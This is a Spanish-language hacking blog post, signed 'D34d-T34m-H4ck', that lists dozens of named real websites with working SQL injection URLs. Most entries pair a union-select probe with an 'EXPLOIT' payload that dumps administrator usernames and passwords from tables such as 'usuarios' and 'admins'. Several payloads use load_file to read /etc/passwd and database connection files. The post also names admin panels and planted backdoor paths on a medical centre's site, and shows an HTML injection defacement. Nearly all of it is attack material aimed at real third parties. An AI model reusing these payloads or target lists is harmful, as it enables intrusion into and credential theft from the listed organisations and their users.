[ s1kr@Security ] $ ./L0cal_R00t: algunas inyecciones

http://www.creadorescolombianos.com/contenido.php?id=

-1+union+select+0,1,2,3,4,5,6,7,8--

EXPLOIT:

-1+union+select+0,concat(id,0x3a,username,0x3a,password),unhex(hex(@@version)),3,4,5,6,7,8+from+usuarios--

__________________________________________________________________________________________________________________________

http://www.elconfidencialmusical.com/noticias.php?id=

-1+union+all+select+0,1,version(),3,4,5--

EXPLOIT:

-1+union+all+select+0,1,password,3,4,5+from+users--

_________________________________________________________________________________________________________________________

http://www.eshci.com/contenido.php?id=

-1+union+all+select+0,1,2,3

EXPLOIT:

-1+union+all+select+0,concat(login,0x3a,password),2,3+from+usuarios--

____________________________________________________________________________________________________________________________

http://www.sportsfeatures.com/PressPoint/show.php?id=

null+union+all/**/select+0,1,2,3--

EXPLOIT:

-1+union+all+select+0,1,concat(kAdminID,0x3a,tAdmin,0x3a,tPassword,0x3a,tName,0x3a,nRank,0x3a,dModifiedDate,0x3a,nActive),3+from+admins

__________________________________________________________________________________________________________________________

http://www.unabvirtual.edu.co/programa.php?id=

-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13--

EXPLOIT:

-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pass),12,13+from+usuarios--

__________________________________________________________________________________________________________________________

http://www.metroeast.org/articles/show.php?id=

-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

EXPLOIT:

-1+union+all+select+0,1,2,3,concat(name,0x3a,p_text,0x3a,u_permit),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user

__________________________________________________________________________________________________________________________

http://www.sufficiencyeconomy.org/show.php?Id=

-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14--

EXPLOIT:

-1+union+all+select+0,1,2,3,4,concat(db_login,0x3a,db_pwd%20),6,7,8,9,10,11,12,13,14+from+useradmin--

__________________________________________________________________________________________________________________________

http://guiasyscouts6.com/secciones.php?id=

-1+union+all+select+0,1,2

EXPLOIT:

-1+union+all+select+0,concat(usuario,0x3a,clave),2+from+usuario

__________________________________________________________________________________________________________________________

http://www.dontshake.ca/news/news.php?id=

-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11--

EXPLIT:

-1+union+all+select+0,1,concat(name,0x3a,password),3,4,5,6,7,8,9,10,11+from+users

___________________________________________________________________________________________________________________________

http://www.cageprisoners.com/admin

http://www.cageprisoners.com/articles.php?id=

-1+union+all+select+0,1,2,3,4,5--

EXPLOIT:

-1+union+all+select+0,1,concat(id,0x3a,username,0x3a,password,0x3a,email,0x3a,level),3,4,5+from+admins--

__________________________________________________________________________________________________________________________

http://www.partidosocialista.com.ar/PS/adm/front/gestor.php

http://www.partidosocialista.com.ar/PS/seccion.php?go=vernota&i=

-1+union+all+select+0,1,2,3,4,5,6,7,8,9--

EXPLOIT:

-1+union+all+select+0,1,concat(uh_usuario,0x3d,uh_password),database(),unhex(hex(@@version)),5,user(),7,8,9+from+usuarios_head--

__________________________________________________________________________________________________________________________

http://www.baibrama.cult.cu/pages/noticia.php?id=-1+union+all+select+0,concat(usuario,0x3d,pass,0x3d,nivelacceso),2,3,4,5,6+from+usuarios--

http://www.aetical.com/detallenoticia.php?ref=-1+union+all+select+concat(login,0x3d,pwd),2,3,4,5+from+usuarios

http://www.conservation.org.co/noticiadetalle.php?idnot=-1/**/union/**/select+0,concat(useradmin,0x3a,pssw,0x3a,conpssw),2,3,4,5,6,7,8,9,10,11+from+adminuuser--

http://www.ucr.ac.cr/mostrar_noticia.php?ID=-1+union+all+select+0,concat(clave,0x3a,usuario),2,3,4,5,6,7,8,9,10+from+usuarios+where%20id=2--

http://www.ampadvantage.com.my/site/news_.php?id=92%20and%201=0%20union%20all%20select%201,2,3,4,concat_ws(0x3d,username,password)%20from%20admin--
---------------------------------------------------------------------------------------------

http://www.vannichile.cl/inc__home_flash.php

http://www.href.cl/sitio/docs/inc__home_flash.php

http://www.centrocanceruc.cl/pacientes/nuestrosMedicos_resp.php?id=-1+union+select+0,1,2,3,concat(usuario,0x3d,password)+From+usuarios+limit+2,1--

http://www.centrocanceruc.cl/admin/yolovivi_archivos/ideas.php (Back door)
http://www.centrocanceruc.cl/medicos/stdom.php (back door)
---------------------------------------------------------------------------------------------------------------------

http://www.lasemana.es/periodico/noticia.php?cod=-1+union+all+select+0,1,2,load_file(0x2f6574632f706173737764),column_name,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(117,%20115,%20101,114)+limit+2,1--

-----------------------------------------------------------------------------

http://www.planetariochile.cl/actividades.php?idNoticia=102+and+1=0+union+select+all+1,2,load_file(0x2f7661722f7777772f68746d6c2f664e6f74696369612e706870),4,5,6,7,8,9,10,11,12,13

---------------------------------------------------------------------------------

http://www.viviendas.cl/admin/tbl_adminlist.php

http://www.viviendas.cl/destacados_detalle.php?idp=-1+union+all+select+1,2,3,concat_ws(0x3d,adm_id,adm_usuario,adm_clave),5,6,7,8,9,10,11,12,13,14,15+from+tbl_admin%20where%20adm_id=3--

-----------------------------------------------------------------------------------------------

http://www.mdu.cl/documentos/ver.php?id=-98%20and%201=1%20+union+select+0,concat(email,0x3d,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,22,24,25,26,27,28,29,30,31,32,33,34,35,36+from+usuarios+limit+2,1--

-------------------------------------------------------------------------------------------------------------------------------

http://www.regiondeloslagos.cl/consejo/actas2006.php?anio_busca=-999999999+union+all+select+0,1,2,3,4,5,load_file(0x433a5c4172636869766f732064652070726f6772616d615c4170616368652047726f75705c417061636865325c6874646f63735c696e636c7564655c636f6e6578696f6e5f64622e706870)--

-------------------------------------------------------------------------------

http://www.bostoncollege.cl/index.php?op=colegios/c_principal&col=-1+union+select+0,concat_ws(0x3d,user(),database(),version())--

--------------------------------------------------------------------------

http://www.nikoncenter.cl/catalogo.php?id=-1+union+select+concat(id,0x3d,nombre,0x3d,user,0x3d,pswd)+from+usuarios--

--------------------------------------------------------------------------

http://www.alltek.cl/detalle.php?catalogoID=-1+union+select+0,1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=char(103,112,95,117,115,117,97,114,105,111,115)+limit--

-----------------------------------------------------------------------

http://www.ing.puc.cl/esp/alumpostgrado/investigacion/inv.html?act=isi&year=%3Ch1%3EDead-team-H4ck%3Ch1%3E

by D34d-T34m-H4ck

[ s1kr@Security ] $ ./L0cal_R00t

algunas inyecciones

No hay comentarios:

Publicar un comentario